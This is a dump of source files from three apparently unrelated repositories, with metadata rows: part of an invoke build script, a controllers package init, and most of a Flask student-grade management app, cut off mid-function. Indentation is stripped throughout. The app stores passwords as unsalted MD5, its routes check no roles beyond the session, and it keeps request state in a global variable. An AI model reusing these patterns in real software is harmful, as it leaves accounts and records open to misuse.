"""Cleans the local copy from compiled artifacts."""
with chdir(BASE_FOLDER):
if builds:
ctx.run('python setup.py clean')
if bytecode:
for root, dirs, files in os.walk(BASE_FOLDER):
for f in files:
if f.endswith('.pyc'):
os.remove(os.path.join(root, f))
if '.git' in dirs:
dirs.remove('.git')
folders = []
if docs:
folders.append('docs/api/generated')
folders.append('dist/')
if bytecode:
for t in ('src', 'tests'):
folders.extend(glob.glob('{}/**/__pycache__'.format(t), recursive=True))
if builds:
folders.append('build/')
folders.append('src/arc_311_magic.egg-info/')
for folder in folders:
rmtree(os.path.join(BASE_FOLDER, folder), ignore_errors=True)
@task(help={
'rebuild': 'True to clean all previously built docs before starting, otherwise False.',
'doctest': 'True to run doctests, otherwise False.',
'check_links': 'True to check all web links in docs for validity, otherwise False.'})
def docs(ctx, doctest=False, rebuild=True, check_links=False):
"""Builds package's HTML documentation."""
if rebuild:
clean(ctx)
with chdir(BASE_FOLDER):
if doctest:
ctx.run('sphinx-build -E -b doctest docsource docs')
ctx.run('sphinx-build -E -b html docsource docs')
if check_links:
ctx.run('sphinx-build -E -b linkcheck docsource docs')
@task()
def check(ctx):
"""Check the consistency of documentation, coding style and a few other things."""
with chdir(BASE_FOLDER):
log.write('Checking MANIFEST.in...')
ctx.run('check-manifest --ignore-bad-ideas=test.so,fd.so,smoothing.so,drx_c.so')
log.write('Checking metadata...')
ctx.run('python setup.py check --strict --metadata')
log.write('Running flake8 python linter...')
ctx.run('flake8 --count --statistics src tests')
# log.write('Checking python imports...')
# ctx.run('isort --check-only --diff --recursive src tests setup.py')
@task(help={
'checks': 'True to run all checks before testing, otherwise False.'})
def test(ctx, checks=False, doctest=False):
"""Run all tests."""
if checks:
check(ctx)
with chdir(BASE_FOLDER):
cmd = ['pytest']
if doctest:
cmd.append('--doctest-modules')
ctx.run(' '.join(cmd))
@task
def prepare_changelog(ctx):
"""Prepare changelog for next release."""
UNRELEASED_CHANGELOG_TEMPLATE = '## Unreleased\n\n### Added\n\n### Changed\n\n### Removed\n\n\n## '
with chdir(BASE_FOLDER):
# Preparing changelog for next release
with open('CHANGELOG.md', 'r+') as changelog:
content = changelog.read()
changelog.seek(0)
changelog.write(content.replace(
'## ', UNRELEASED_CHANGELOG_TEMPLATE, 1))
ctx.run('git add CHANGELOG.md && git commit -m "Prepare changelog for next release"')
@task(help={
'release_type': 'Type of release follows semver rules. Must be one of: major, minor, patch.'})
def release(ctx, release_type):
"""Releases the project in one swift command!"""
if release_type not in ('patch', 'minor', 'major'):
raise Exit('The release type parameter is invalid.\nMust be one of: major, minor, patch')
# Run checks
ctx.run('invoke check test')
# Bump version and git tag it
ctx.run('bumpversion %s --verbose' % release_type)
# Build project
ctx.run('python setup.py clean --all sdist bdist_wheel')
# Upload to pypi
if confirm('You are about to upload the release to pypi.org. Are you sure? [y/N]'):
files = ['dist/*.whl', 'dist/*.gz', 'dist/*.zip']
dist_files = ' '.join([pattern for f in files for pattern in glob.glob(f)])
if len(dist_files):
ctx.run('twine upload --skip-existing %s' % dist_files)
prepare_changelog(ctx)
else:
raise Exit('No files found to release')
else:
raise Exit('Aborted release')
@contextlib.contextmanager
def chdir(dirname=None):
current_dir = os.getcwd()
try:
if dirname is not None:
os.chdir(dirname)
yield
finally:
os.chdir(current_dir)
| [
"mskepasts@gmail.com"
] | mskepasts@gmail.com |
c8e141a266777c7b7c4c27b0d4e2c748a2fba65a | ed647f7a09659c803e8a43cb20d32d2ad1bf520d | /src/webapp/controllers/__init__.py | e00a845027ce17541ac6083c460bc5c7e00b539e | [
"Apache-2.0"
] | permissive | Alvaruto1/project-caos | 2b88e8315fa39138c9df469660bf021a4a52807c | 16a51fbe2dc573f0706ead8fe8b99c8ba7c362c5 | refs/heads/master | 2020-12-01T13:55:04.059610 | 2020-01-01T07:45:54 | 2020-01-01T07:45:54 | 230,649,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | """Import all the controllers from the project"""
import pkgutil as _pkgutil
_search_path = ['src/webapp/controllers']
__all__ = [x[1] for x in _pkgutil.iter_modules(path=_search_path)] | [
"camilo.ospinaa@gmail.com"
] | camilo.ospinaa@gmail.com |
e7bc2d2a8c3145e84c9b38fe49d5d18db00a0893 | bfff820f48bda49acbb683f02c135662f03671cd | /database_project/database.py | 96ccccf0b07902cfe31f0394a69ff9e89d5054af | [] | no_license | Prowes5/database_project | 3a48c8c03aa286ed841b19f6e9443f90c5b07824 | 34dc2e5c36a00bbee7ff729a3d9eac0e534cf699 | refs/heads/master | 2020-04-28T15:50:03.018781 | 2019-11-12T10:22:46 | 2019-11-12T10:22:46 | 175,390,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66,244 | py | # -*- coding: utf-8 -*-
from flask import Flask,render_template,request,redirect,url_for
from flask_sqlalchemy import SQLAlchemy
from flask import session
import re
import config
import hashlib
app = Flask(__name__)
app.config.from_object(config)
db = SQLAlchemy(app)
global Stu_no_sel
global Tea_no_sel
class lesson_stu(db.Model):
__tablename__ = 'lesson_stu'
stu_no = db.Column('stu_no', db.String(10), db.ForeignKey('student.StuNo'), primary_key=True)
lesson_no = db.Column('lesson_no', db.String(5), db.ForeignKey('lesson.LessonNo'), primary_key=True)
score = db.Column('score', db.Integer)
Lessons = db.relationship('Lesson',backref=db.backref('Stus'))
Stus = db.relationship('Stu', backref=db.backref('Lessons'))
class Course:
def __init__(self,stu_no,stu_name,lesson_no,lesson_name,score):
self.stu_no = stu_no
self.stu_name = stu_name
self.lesson_no = lesson_no
self.lesson_name = lesson_name
self.score = score
class Cscore:
def __init__(self,lesson_no,lesson_name,lesson_credit,score):
self.lesson_no = lesson_no
self.lesson_name = lesson_name
self.lesson_credit = lesson_credit
self.score = score
class Stu(db.Model):
__tablename__ = 'student'
StuNo = db.Column(db.String(10),primary_key=True) #学号
StuName = db.Column(db.String(30),nullable=False) #姓名
StuPass = db.Column(db.String(32),nullable=False) #密码
StuGen = db.Column(db.String(4),nullable=False) #性别
StuGrade = db.Column(db.Integer, nullable=False) #年级
StuPro = db.Column(db.String(20), nullable=False) #专业
StuYear = db.Column(db.Integer,nullable=False) #学制
StuAddr = db.Column(db.String(50),nullable=False) #地区
StuAge = db.Column(db.Integer,nullable=False) #年龄
StuPol = db.Column(db.String(20),nullable=False) #政治面貌
StuNation = db.Column(db.String(10),nullable=False) #民族
StuRec = db.Column(db.Text) #奖惩记录
StuFlag = db.Column(db.String(100)) #修复转退标记
class Manage(db.Model):
__tablename__ = 'manager'
username = db.Column(db.String(10),primary_key=True) #管理员用户名
password = db.Column(db.String(32),nullable=False) #管理员密码
class Lesson(db.Model):
__tablename__ = 'lesson'
LessonNo = db.Column(db.String(5),primary_key=True)
LessonName = db.Column(db.String(20),nullable=False)
LessonCredits = db.Column(db.Integer,nullable=False)
Tea_No = db.Column(db.String(8), db.ForeignKey('teacher.TeaNo'))
Tea = db.relationship('Tea',backref = db.backref('lessons'))
class Tea(db.Model):
__tablename__ = 'teacher'
TeaNo = db.Column(db.String(8),primary_key=True)
TeaName = db.Column(db.String(30),nullable=False)
TeaPass = db.Column(db.String(32),nullable=False)
db.create_all()
#跳转到登录页面
@app.route('/')
def hello_world():
return redirect(url_for('login'))
#登录
@app.route('/login/',methods=['GET','POST'])
def login():
if request.method == 'GET':
return render_template('login.html')
else:
No = request.form.get('No')
if len(No)==8:
TeaNo = No
password = Md5(request.form.get('password'))
user = Tea.query.filter(Tea.TeaNo == TeaNo,Tea.TeaPass==password).first()
if user:
session['user_No'] = user.TeaNo
session.permanent = True
return redirect(url_for('Tindex'))
else:
return '<script>' \
'alert("登录失败,请重新登录。");' \
'window.history.back(-1);' \
'</script>'
elif len(No) == 10:
StuNo = No
password = Md5(request.form.get('password'))
user = Stu.query.filter(Stu.StuNo == StuNo,Stu.StuPass==password).first()
if user:
session['user_No'] = user.StuNo
session.permanent = True
return redirect(url_for('Sindex'))
else:
return '<script>' \
'alert("登录失败,请重新登录。");' \
'window.history.back(-1);' \
'</script>'
elif len(No) == 5:
username = No
password = Md5(request.form.get('password'))
user = Manage.query.filter(Manage.username == username,Manage.password == password).first()
if user:
session['user_No'] = user.username
session.permanent = True
return redirect(url_for('Mindex'))
else:
return '<script>' \
'alert("登录失败,请重新登录。");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("登录失败,请重新登录。");' \
'window.history.back(-1);' \
'</script>'
#教师首页
@app.route('/teacher/index/')
def Tindex():
addrs = []
nations = []
pols = []
ages = []
dic1 = {}
dic2 = {}
dic3 = {}
dic4 = {}
stus = Stu.query.filter().all()
for stu in stus:
addrs.append(stu.StuAddr[0:2])
nations.append(stu.StuNation)
pols.append(stu.StuPol)
ages.append(stu.StuAge)
# 统计学生地区
for addr in addrs:
d = dic1.get(addr)
if d == None:
dic1[addr] = 1
else:
dic1[addr] = dic1[addr] + 1
for dic in dic1:
dic1[dic] = dic1[dic] / len(stus) * 100
# 统计学生民族
for nation in nations:
d = dic2.get(nation)
if d == None:
dic2[nation] = 1
else:
dic2[nation] = dic2[nation] + 1
for dic in dic2:
dic2[dic] = dic2[dic] / len(stus) * 100
# 统计学生的政治面貌
for pol in pols:
d = dic3.get(pol)
if d == None:
dic3[pol] = 1
else:
dic3[pol] = dic3[pol] + 1
for dic in dic3:
dic3[dic] = dic3[dic] / len(stus) * 100
# 统计学生的年龄
for age in ages:
d = dic4.get(age)
if d == None:
dic4[age] = 1
else:
dic4[age] = dic4[age] + 1
for dic in dic4:
dic4[dic] = dic4[dic] / len(stus) * 100
lss = lesson_stu.query.filter().all()
dic5 = {}
scores = []
for ls in lss:
scores.append(ls.score)
for score in scores:
if score == None:
score = '无成绩'
elif score < 60 and score >= 0:
score = '不及格'
elif score >= 60 and score < 70:
score = '及格'
elif score < 80 and score >= 70:
score = '中等'
elif score < 90 and score >= 80:
score = '良好'
elif score <= 100 and score >= 90:
score = '优秀'
else:
score = '无成绩'
d = dic5.get(score)
if d == None:
dic5[score] = 1
else:
dic5[score] = dic5[score] + 1
for dic in dic5:
dic5[dic] = dic5[dic] / len(lss) * 100
dic5[dic] = round(dic5[dic], 1)
return render_template('Tindex.html', dic1=dic1, dic2=dic2, dic3=dic3, dic4=dic4, dic5=dic5)
#学生首页
@app.route('/student/index/')
def Sindex():
addrs = []
nations = []
pols = []
ages = []
dic1 = {}
dic2 = {}
dic3 = {}
dic4 = {}
stus = Stu.query.filter().all()
for stu in stus:
addrs.append(stu.StuAddr[0:2])
nations.append(stu.StuNation)
pols.append(stu.StuPol)
ages.append(stu.StuAge)
# 统计学生地区
for addr in addrs:
d = dic1.get(addr)
if d == None:
dic1[addr] = 1
else:
dic1[addr] = dic1[addr] + 1
for dic in dic1:
dic1[dic] = dic1[dic] / len(stus) * 100
# 统计学生民族
for nation in nations:
d = dic2.get(nation)
if d == None:
dic2[nation] = 1
else:
dic2[nation] = dic2[nation] + 1
for dic in dic2:
dic2[dic] = dic2[dic] / len(stus) * 100
# 统计学生的政治面貌
for pol in pols:
d = dic3.get(pol)
if d == None:
dic3[pol] = 1
else:
dic3[pol] = dic3[pol] + 1
for dic in dic3:
dic3[dic] = dic3[dic] / len(stus) * 100
# 统计学生的年龄
for age in ages:
d = dic4.get(age)
if d == None:
dic4[age] = 1
else:
dic4[age] = dic4[age] + 1
for dic in dic4:
dic4[dic] = dic4[dic] / len(stus) * 100
lss = lesson_stu.query.filter().all()
dic5 = {}
scores = []
for ls in lss:
scores.append(ls.score)
for score in scores:
if score == None:
score = '无成绩'
elif score < 60 and score >= 0:
score = '不及格'
elif score >= 60 and score < 70:
score = '及格'
elif score < 80 and score >= 70:
score = '中等'
elif score < 90 and score >= 80:
score = '良好'
elif score <= 100 and score >= 90:
score = '优秀'
else:
score = '无成绩'
d = dic5.get(score)
if d == None:
dic5[score] = 1
else:
dic5[score] = dic5[score] + 1
for dic in dic5:
dic5[dic] = dic5[dic] / len(lss) * 100
dic5[dic] = round(dic5[dic], 1)
return render_template('Sindex.html', dic1=dic1, dic2=dic2, dic3=dic3, dic4=dic4, dic5=dic5)
#教师管理学生
@app.route('/teacher/chart/')
def Tchart():
return render_template('Tchart.html')
@app.route('/teacher/form/')
def Tform():
return render_template('Tform.html')
#学生查询成绩
@app.route('/student/form/')
def Sform():
ssc = []
Stu_no = session.get('user_No')
ls = lesson_stu.query.filter(lesson_stu.stu_no == Stu_no).all()
for l in ls:
score = l.score
lesson = Lesson.query.filter(Lesson.LessonNo == l.lesson_no).first()
lesson_no = lesson.LessonNo
lesson_name = lesson.LessonName
lesson_credit = lesson.LessonCredits
cssore = Cscore(lesson_no=lesson_no,lesson_name=lesson_name,lesson_credit=lesson_credit,score=score)
ssc.append(cssore)
return render_template('Sform.html',ssc=ssc)
#教师管理学生成绩
@app.route('/teacher/tab_panel/',methods=['GET','POST'])
def Ttab_panel():
if request.method == 'GET':
courses = []
Tea_No = session.get('user_No')
tea = Tea.query.filter(Tea.TeaNo == Tea_No).first()
for lesson in tea.lessons:
stus = lesson_stu.query.filter(lesson_stu.lesson_no == lesson.LessonNo).all()
for stu in lesson.Stus:
stud = Stu.query.filter(Stu.StuNo == stu.stu_no).first()
les = Lesson.query.filter(Lesson.LessonNo == stu.lesson_no).first()
stu_no = stu.stu_no
stu_name = stud.StuName
lesson_no = stu.lesson_no
lesson_name = les.LessonName
score = stu.score
course = Course(stu_no=stu_no,stu_name=stu_name,lesson_no=lesson_no,lesson_name=lesson_name,score=score)
courses.append(course)
return render_template('Ttab-panel.html', courses=courses)
else:
if request.form.get('lesson_no'):
lesson_no = request.form.get('lesson_no')
stu_no = request.form.get('stu_no')
score = request.form.get('score')
temp1 = re.search("\\D+",lesson_no)
if temp1:
return '<script>' \
'alert("课程号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp2 = re.search("\\D+",stu_no)
if temp2:
return '<script>' \
'alert("学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp3 = re.search("\\D+",score)
if temp3:
return '<script>' \
'alert("输入的成绩不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if len(lesson_no) == 5 and len(stu_no) == 10:
score = int(score)
ls = lesson_stu.query.filter(lesson_stu.lesson_no==lesson_no,lesson_stu.stu_no==stu_no).first()
if ls==None:
return '<script>' \
'alert("没有这个学生或课程或这个学生没有选这个课程");' \
'window.history.back(-1);' \
'</script>'
if ls.score:
return '<script>' \
'alert("这个课程已经有成绩了,如果想要修改请到修改模块");' \
'window.history.back(-1);' \
'</script>'
ls.score = score
db.session.commit()
return redirect(url_for('Ttab_panel'))
else:
return '<script>' \
'alert("课程号或学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if request.form.get('lesson_no_last'):
lesson_no = request.form.get('lesson_no_last')
stu_no = request.form.get('stu_no_last')
score = request.form.get('score_last')
temp1 = re.search("\\D+", lesson_no)
if temp1:
return '<script>' \
'alert("课程号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp2 = re.search("\\D+", stu_no)
if temp2:
return '<script>' \
'alert("学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp3 = re.search("\\D+", score)
if temp3:
return '<script>' \
'alert("输入的成绩不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if len(lesson_no) == 5 and len(stu_no) == 10:
if score == '':
return '<script>' \
'alert("请输入你想要修改后的成绩,请重新输入");' \
'window.history.back(-1);' \
'</script>'
score = int(score)
ls = lesson_stu.query.filter(lesson_stu.lesson_no == lesson_no, lesson_stu.stu_no == stu_no).first()
if ls.score:
ls.score = score
db.session.commit()
return redirect(url_for('Ttab_panel'))
else:
return '<script>' \
'alert("这个课程已经还没有成绩,如果想要添加请到添加模块");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("课程号或学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if request.form.get('lesson_no_de'):
lesson_no = request.form.get('lesson_no_de')
stu_no = request.form.get('stu_no_de')
temp1 = re.search("\\D+",lesson_no)
temp2 = re.search("\\D+",stu_no)
if temp1:
return '<script>' \
'alert("课程号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if temp2:
return '<script>' \
'alert("学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if len(lesson_no) == 5 and len(stu_no) == 10:
ls = lesson_stu.query.filter(lesson_stu.lesson_no ==lesson_no,lesson_stu.stu_no == stu_no).first()
if ls.score:
ls.score = None
db.session.commit()
else:
return '<script>' \
'alert("这里本来就没有成绩,删除失败");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("课程号或学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
return redirect(url_for('Ttab_panel'))
#老师查询学生简历
@app.route('/teacher/table/')
def Ttable():
stus = Stu.query.filter().all()
return render_template('Ttable.html',stus = stus)
#学生个人简历
@app.route('/student/table')
def Stable():
return render_template('Stable.html')
#老师课程管理
@app.route('/teacher/ui_elements/',methods=['GET','POST'])
def Tui_elements():
if request.method == 'GET':
return render_template('Tui-elements.html')
else:
lesson_no = request.form.get('lesson_no')
if lesson_no:
lesson_name = request.form.get('lesson_name')
lesson_credits = request.form.get('lesson_credits')
if lesson_no == '' or lesson_name == '' or lesson_credits == '':
return '<script>' \
'alert("课程号、课程名称和学分都需要添加,请重新输入");' \
'window.history.back(-1);' \
'</script>'
fff = re.search("\\D+",lesson_credits)
if fff:
return '<script>' \
'alert("您输入了非法的学分,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
lesson_credits = int(lesson_credits)
flag = re.search("\\D+",lesson_no)
if flag:
return '<script>' \
'alert("您输入了非法的课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
if len(lesson_no) == 5:
lesson = Lesson.query.filter(Lesson.LessonNo == lesson_no).first()
print(lesson_no)
print(lesson)
if lesson:
if lesson.Tea_No:
return '<script>' \
'alert("此课程号以存在,添加失败,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
lesson.Tea = Tea.query.filter(Tea.TeaNo == session.get('user_No')).first()
db.session.commit()
return redirect(url_for('Tui_elements'))
else:
if lesson_credits <=10 and lesson_credits > 0:
lesson = Lesson(LessonNo=lesson_no,LessonName=lesson_name,LessonCredits=lesson_credits)
lesson.Tea = Tea.query.filter(Tea.TeaNo == session.get('user_No')).first()
db.session.add(lesson)
db.session.commit()
return render_template('Tui-elements.html')
else:
return '<script>' \
'alert("您输入了非法的学分,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("您输入了非法的课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
lesson_no_last = request.form.get('lesson_no_last')
if lesson_no_last:
lesson_name_last = request.form.get('lesson_name_last')
lesson_credits_last = request.form.get('lesson_credits_last')
if lesson_no_last == '' or lesson_name_last == '' or lesson_credits_last == '':
return '<script>' \
'alert("课程名称和学分都需要重新修改,请重新输入");' \
'window.history.back(-1);' \
'</script>'
fff = re.search('\\D+', lesson_credits_last)
if fff:
return '<script>' \
'alert("您输入了非法的学分,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
lesson_credits_last = int(lesson_credits_last)
flag = re.search('\\D+', lesson_no_last)
if flag:
return '<script>' \
'alert("不存在此课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
if len(lesson_no_last) == 5:
if lesson_credits_last <= 10 and lesson_credits_last > 0:
lesson = Lesson.query.filter(Lesson.LessonNo == lesson_no_last).first()
if lesson:
lesson.LessonName = lesson_name_last
lesson.LessonCredits = lesson_credits_last
db.session.commit()
return render_template('Tui-elements.html')
else:
return '<script>' \
'alert("不存在此课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("您输入了非法的学分,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("不存在此课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
lesson_no_de = request.form.get('lesson_no_de')
if lesson_no_de:
if lesson_no_de == '':
return '<script>' \
'alert("需要添加课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if len(lesson_no_de) == 5:
lesson = Lesson.query.filter(Lesson.LessonNo == lesson_no_de).first()
if lesson:
db.session.delete(lesson)
db.session.commit()
return render_template('Tui-elements.html')
else:
return '<script>' \
'alert("不存在的课程,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("不存在的课程,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("课程号、课程名称和学分都需要添加,请重新输入");' \
'window.history.back(-1);' \
'</script>'
#学生选课
@app.route('/student/ui_elements',methods=['GET','POST'])
def Sui_elements():
if request.method == 'GET':
scs = []
#得到session中的学号
stu_no = session.get('user_No')
#找到该学生
stu = Stu.query.filter(Stu.StuNo == stu_no).first()
#找到学生相联系的课程
for lesson in stu.Lessons:
Lessons = lesson_stu.query.filter(lesson_stu.stu_no == stu_no).all()
for lessonl in Lessons:
sc = Lesson.query.filter(Lesson.LessonNo == lessonl.lesson_no).first()
scs.append(sc)
scs = list(set(scs))
scs_no = []
notscs = []
for sc in scs:
scs_no.append(sc.LessonNo)
Lessons = Lesson.query.filter().all()
for lesson in Lessons:
if lesson.LessonNo not in scs_no:
notscs.append(lesson)
return render_template('Sui-elements.html',scs=scs,notscs=notscs)
else:
scs = []
stu_no = session.get('user_No')
# 找到该学生
stu = Stu.query.filter(Stu.StuNo == stu_no).first()
# 找到学生相联系的课程
for lesson in stu.Lessons:
Lessons = lesson_stu.query.filter(lesson_stu.stu_no == stu_no).all()
for lessonl in Lessons:
sc = Lesson.query.filter(Lesson.LessonNo == lessonl.lesson_no).first()
scs.append(sc)
scs_no = []
notscs = []
notscs_no = []
for sc in scs:
scs_no.append(sc.LessonNo)
Lessons = Lesson.query.filter().all()
for lesson in Lessons:
if lesson.LessonNo not in scs_no:
notscs.append(lesson)
notscs_no.append(lesson.LessonNo)
#将未选的课程号取出组成列表
if request.form.get('lesson_no'):
sc = []
lesson_no = request.form.get('lesson_no')
temp1 = re.search("\\D+",lesson_no)
#课程是否
if temp1:
return '<script>' \
'alert("课程号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if len(lesson_no) == 5:
# 查找总课表里是否有这个课程
lesson = Lesson.query.filter(Lesson.LessonNo == lesson_no).first()
if lesson:
# 判断课程是否已选
if lesson_no in notscs_no:
ls = lesson_stu(stu_no=stu_no, lesson_no=lesson_no)
db.session.add(ls)
db.session.commit()
else:
return '<script>' \
'alert("这个课程你已经添加过了,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("系统中没有这个课程,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("课程号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
#删除已选课程
if request.form.get('lesson_no_last'):
lesson_no_last = request.form.get('lesson_no_last')
temp1 = re.search("\\D+", lesson_no_last)
if temp1:
return '<script>' \
'alert("课程号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if len(lesson_no_last) == 5:
ls = lesson_stu.query.filter(lesson_stu.lesson_no == lesson_no_last).first()
if ls:
db.session.delete(ls)
db.session.commit()
else:
return '<script>' \
'alert("没有添加这个课程,删除失败");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("没有这个课程,请重新输入");' \
'window.history.back(-1);' \
'</script>'
return redirect(url_for('Sui_elements'))
#老师添加学生
@app.route('/teacher/chart/TinsertS/',methods=['GET','POST'])
def T_insert_S():
if request.method == 'GET':
return render_template('TinsertS.html')
else:
Stu_no = request.form.get('Stu_no')
Stu_name = request.form.get('Stu_name')
Stu_pass = request.form.get('Stu_pass')
Stu_gen = request.form.get('Stu_gen')
Stu_grade = request.form.get('Stu_grade')
Stu_pro = request.form.get('Stu_pro')
Stu_year = request.form.get('Stu_year')
Stu_addr = request.form.get('Stu_addr')
Stu_age = request.form.get('Stu_age')
Stu_nation = request.form.get('Stu_nation')
Stu_pol = request.form.get('Stu_pol')
Stu_rec = request.form.get('Stu_rec')
Stu_flag = request.form.get('Stu_flag')
temp1 = re.search("\\D+",Stu_no)
if Stu_no == '' or Stu_name == '' or Stu_gen == '' or Stu_grade == '' or Stu_pro == '' or Stu_year == '' or Stu_addr == '' or Stu_age == '' or Stu_nation == '' or Stu_pol == '' or Stu_pass == '':
return '<script>' \
'alert("学号、姓名、性别、年级、专业、学制、现住址、年龄、民族和政治面貌这些都需要输入,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if temp1:
return '<script>' \
'alert("学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp2 = re.search("\\D+",Stu_grade)
if temp2:
return '<script>' \
'alert("年级不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp3 = re.search("\\D+",Stu_year)
if temp3:
return '<script>' \
'alert("学制不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp4 = re.search("\\D+",Stu_age)
if temp4:
return '<script>' \
'alert("年龄不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_gen != u'男' and Stu_gen != u'女':
return '<script>' \
'alert("性别输入不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
Stu_grade = int(Stu_grade)
Stu_year = int(Stu_year)
Stu_age = int(Stu_age)
if Stu_grade <= 1970:
return '<script>' \
'alert("输入的年级不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_year<=0 or Stu_year >= 10:
return '<script>' \
'alert("输入的学制不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_age <=12 or Stu_age >=100:
return '<script>' \
'alert("输入的年龄有点儿离谱,如情况属实,请联系管理员");' \
'window.history.back(-1);' \
'</script>'
if len(Stu_no) != 10:
return '<script>' \
'alert("学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
stu = Stu.query.filter(Stu.StuNo == Stu_no).first()
if stu:
return '<script>' \
'alert("该学生已经存在,请重新输入学号添加");' \
'window.history.back(-1);' \
'</script>'
stu = Stu(StuNo=Stu_no,StuName=Stu_name,
StuPass=Md5(Stu_pass),StuGen=Stu_gen,
StuGrade=Stu_grade,StuPro=Stu_pro,
StuYear=Stu_year,StuAddr=Stu_addr,
StuAge=Stu_age,StuPol=Stu_pol,
StuNation=Stu_nation,StuRec=Stu_rec,
StuFlag=Stu_flag
)
db.session.add(stu)
db.session.commit()
return redirect(url_for('Tchart'))
#老师修改学生
@app.route('/teacher/chart/TupdateS/',methods=['GET','POST'])
def T_update_S():
if request.method == 'GET':
#### 利用全局变量,对用户输入的学号进行查询,并返回到网页上
global Stu_no_sel
Stu_no_sel = request.args.get('Stu_no_sel')
sstu = Stu.query.filter(Stu.StuNo == Stu_no_sel).first()
return render_template('TupdateS.html',sstu=sstu)
else:
Stu_name = request.form.get('Stu_name')
Stu_gen = request.form.get('Stu_gen')
Stu_grade = request.form.get('Stu_grade')
Stu_pro = request.form.get('Stu_pro')
Stu_year = request.form.get('Stu_year')
Stu_addr = request.form.get('Stu_addr')
Stu_age = request.form.get('Stu_age')
Stu_nation = request.form.get('Stu_nation')
Stu_pol = request.form.get('Stu_pol')
Stu_rec = request.form.get('Stu_rec')
Stu_flag = request.form.get('Stu_flag')
### 利用正则表达式和各个条件对输入进行限制
stu = Stu.query.filter(Stu.StuNo == Stu_no_sel).first()
### 如果用户输入为空的话,就看作不改动
if Stu_name == '':
Stu_name = stu.StuName
if Stu_gen == '':
Stu_gen = stu.StuGen
if Stu_grade == '':
Stu_grade = stu.StuGrade
if Stu_pro == '':
Stu_pro = stu.StuPro
if Stu_year == '':
Stu_year = stu.StuYear
if Stu_addr == '':
Stu_addr = stu.StuAddr
if Stu_age == '':
Stu_age = stu.StuAge
if Stu_pol == '':
Stu_pol = stu.StuPol
if Stu_nation == '':
Stu_nation = stu.StuNation
Stu_grade = str(Stu_grade)
temp2 = re.search("\\D+", Stu_grade)
if temp2:
return '<script>' \
'alert("年级不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
Stu_year = str(Stu_year)
temp3 = re.search("\\D+", Stu_year)
if temp3:
return '<script>' \
'alert("学制不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
Stu_age = str(Stu_age)
temp4 = re.search("\\D+", Stu_age)
if temp4:
return '<script>' \
'alert("年龄不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_gen != u'男' and Stu_gen != u'女' and Stu_gen != '':
return '<script>' \
'alert("性别输入不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
Stu_grade = int(Stu_grade)
Stu_year = int(Stu_year)
Stu_age = int(Stu_age)
if Stu_grade <= 1970:
return '<script>' \
'alert("输入的年级不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_year <= 0 or Stu_year >= 10:
return '<script>' \
'alert("输入的学制不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_age <= 12 or Stu_age >= 100:
return '<script>' \
'alert("输入的年龄有点儿离谱,如情况属实,请联系管理员");' \
'window.history.back(-1);' \
'</script>'
if Stu_rec == '':
Stu_rec = stu.StuRec
if Stu_flag == '':
Stu_flag = stu.StuFlag
stu.StuName = Stu_name
stu.StuGen = Stu_gen
stu.StuGrade = Stu_grade
stu.StuPro = Stu_pro
stu.StuYear = Stu_year
stu.StuAddr = Stu_addr
stu.StuAge = Stu_age
stu.StuPol = Stu_pol
stu.StuNation = Stu_nation
stu.StuRec = Stu_rec
stu.StuFlag = Stu_flag
db.session.commit()
return redirect(url_for('Tchart'))
#老师删除学生
@app.route('/teacher/chart/TdeleteS/',methods=['GET','POST'])
def T_delete_S():
if request.method == 'GET':
return render_template('TdeleteS.html')
else:
